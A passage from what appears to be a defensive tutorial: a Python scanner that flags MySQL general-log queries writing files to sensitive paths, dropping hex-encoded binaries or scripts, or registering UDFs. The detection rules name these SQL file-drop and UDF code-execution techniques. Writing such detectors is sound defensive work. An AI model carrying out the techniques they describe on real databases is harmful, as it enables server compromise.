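        desc = next((d for pat, d in SENSITIVE_PATHS if pat.search(path)), None)
        if desc:
            alerts.append(f'INTO {kind} write to {desc}: {path}')
        if HEX_LITERAL_RE.search(sql):
            alerts.append('long hex literal written to disk (binary or script dropped through SQL)')
    m = CREATE_FUNC_RE.search(sql)
    if m:
        alerts.append(f'UDF registered: {m.group(1)} from {m.group(2)}')
    return alerts


def scan_general_log(lines):
    """Return one hit dict per alert found in the Query entries of the general log."""
    hits = []
    for line in lines:
        m = LOG_LINE_RE.match(line.strip())
        if not m or m.group(3).lower() != 'query':
            continue   # Connect/Quit/Init DB entries carry no statement
        ts, conn_id, _, sql = m.groups()
        for alert in analyse_statement(sql):
            hits.append({'time': ts, 'connection': int(conn_id), 'alert': alert})
    return hits


if __name__ == '__main__':
    for hit in scan_general_log(SAMPLE_LOG):
        print(f"{hit['time']} conn={hit['connection']} {hit['alert']}")
```

The thread id lets the hits be tied back to the Connect entry that opened the session, so the source address and account of the write can be recovered from the same log. The general log is expensive on busy servers; the same statement patterns can be applied to audit-plugin output or to a proxy's query log with only the line-format regex changed.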